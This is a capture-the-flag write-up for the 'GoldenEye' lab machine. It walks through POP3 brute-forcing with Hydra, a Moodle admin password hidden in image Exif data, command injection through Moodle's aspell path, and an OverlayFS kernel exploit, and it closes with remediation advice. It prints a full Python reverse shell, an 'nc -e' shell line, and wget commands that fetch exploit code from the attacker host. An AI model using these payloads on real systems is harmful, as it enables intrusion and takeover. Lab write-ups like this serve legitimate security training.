Target IP: 10.201.20.3 (Requires /etc/hosts entry for severnaya-station.com)
Difficulty: Hard (Enumeration Heavy)
Objective: User & Root Flags
1. Executive Summary
“GoldenEye” is an Ubuntu-based machine hosting a custom web portal and a Moodle Learning Management System (LMS). Initial access is a multi-stage process involving dictionary attacks against a non-standard POP3 service to recover internal emails. These emails leak credentials and endpoints, eventually leading to an administrative account on the Moodle platform. Remote Code Execution (RCE) is achieved by exploiting a misconfiguration in the Aspell spellchecker path within Moodle. Privilege escalation exploits an outdated Linux Kernel (3.13) via the OverlayFS vulnerability (CVE-2015-1328).
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Discovering high ports (55006, 55007).
- T1110 (Brute Force): Hydra attacks against POP3 accounts.
- T1027 (Obfuscated Files or Information): Steganography in Exif data.
- T1190 (Exploit Public-Facing App): Moodle “Aspell” Command Injection.
- T1068 (Exploitation for Privilege Escalation): OverlayFS Kernel Exploit.
2. Operational Setup
Host Configuration
echo "10.201.20.3 severnaya-station.com" | sudo tee -a /etc/hosts3. Enumeration: “The Email Chain”
A. Network Scanning
Your scan revealed the critical architecture:
- 80/tcp: Web Server (GoldenEye Admin).
- 55007/tcp: POP3 (Dovecot). This is the primary attack vector.
B. Phase 1: Boris
- Web Leak:
/terminal.jsrevealedborisand encoded passwordInvincibleHack3r. - Hydra: That password failed, but running Hydra found the correct POP3 pass.
- User:
boris - Pass:
secret1!
- Intel: Emails from
root,natalya, andalec.
- Alec mentions sending access codes to
xenia.
C. Phase 2: Natalya
- Hydra: You brute-forced
natalyaon port 55007.
- Pass:
bird
- Intel: Emails contained credentials for a new user,
xenia.
- User:
xenia - Pass:
RCP90rulez! - Target:
severnaya-station.com/gnocertdir(Moodle).
D. Phase 3: Doak
xenia’s credentials didn’t work on POP3. You moved todoak.- Hydra:
- Pass:
goat
- Intel: An email to James Bond (007).
- User:
dr_doak - Pass:
4England! - Target: Login to the training site (Moodle).
4. Initial Access: Moodle Exploitation
A. Steganography (The Admin Password)
Logging into Moodle as dr_doak revealed s3cret.txt, pointing to /dir007key/for-007.jpg.
- Download:
wget http://severnaya-station.com/dir007key/for-007.jpg - Exif Analysis:
exiftool for-007.jpg
# OR
strings for-007.jpg | grep "Image Description"- Result: Base64 string
eFdpbnRlcjE5OTV4IQ==. - Decode:
xWinter1995x!
- Usage: This is the password for the Moodle
adminuser.
B. Remote Code Execution (Aspell)
We log in to Moodle as admin : xWinter1995x!.
This version of Moodle allows Admins to define the path to the spellchecker (aspell). We can replace this path with a reverse shell command.
The Exploit Steps:
- Navigate: Site Administration -> Server -> System Paths.
- Payload: In the “Path to aspell” field, inject a reverse shell.
# Payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.YOUR.IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'(Note: Sometimes simple netcat works: nc -e /bin/bash 10.10.x.x 4444)
3. Trigger:
- Open any course or forum.
- Create a post/page using the TinyMCE editor.
- Click the “Spellcheck” button (ABC with a checkmark).
- Troubleshooting: You mentioned the editor was lagging. This happens because the server is trying to execute your shell instead of checking spelling. If the shell connects, the HTTP request hangs until you close the shell.
Status: Shell as www-data.
5. Privilege Escalation: OverlayFS
Enumeration
Once inside, we check the OS version.
uname -a
# Linux ubuntu 3.13.0-32-generic ... 2014Kernel 3.13.0 is infamously vulnerable to OverlayFS (CVE-2015-1328).
Exploitation
- Transfer Exploit:
Host
37292.c(from Exploit-DB) on your attacker machine.
# Attacker
cp /usr/share/exploitdb/exploits/linux/local/37292.c .
python3 -m http.server 80# Victim
cd /tmp
wget http://10.10.YOUR.IP/37292.c- Compile:
gcc 37292.c -o overlay- Run:
./overlayResult:
# whoami
rootFlags:
- User:
/home/<user>/user.txt(or inside the Moodle files). - Root:
/root/root.txt.
6. Remediation (Blue Team)
- Patch Management:
- Kernel: Update the Linux Kernel immediately to patch CVE-2015-1328.
- Moodle: Update Moodle to a version that validates the “Aspell Path” or restricts access to sensitive server settings.
- Service Hardening:
- POP3: Enforce strong password policies to prevent dictionary attacks (Hydra). Implement Fail2Ban to block repeated failed login attempts.
- Ports: Change default ports is “Security by Obscurity.” Use standard ports with proper ACLs instead.
- Information Leakage:
- Remove sensitive comments from HTML source code (
/terminal.js,index.html). - Scrub metadata (Exif) from public images (
for-007.jpg).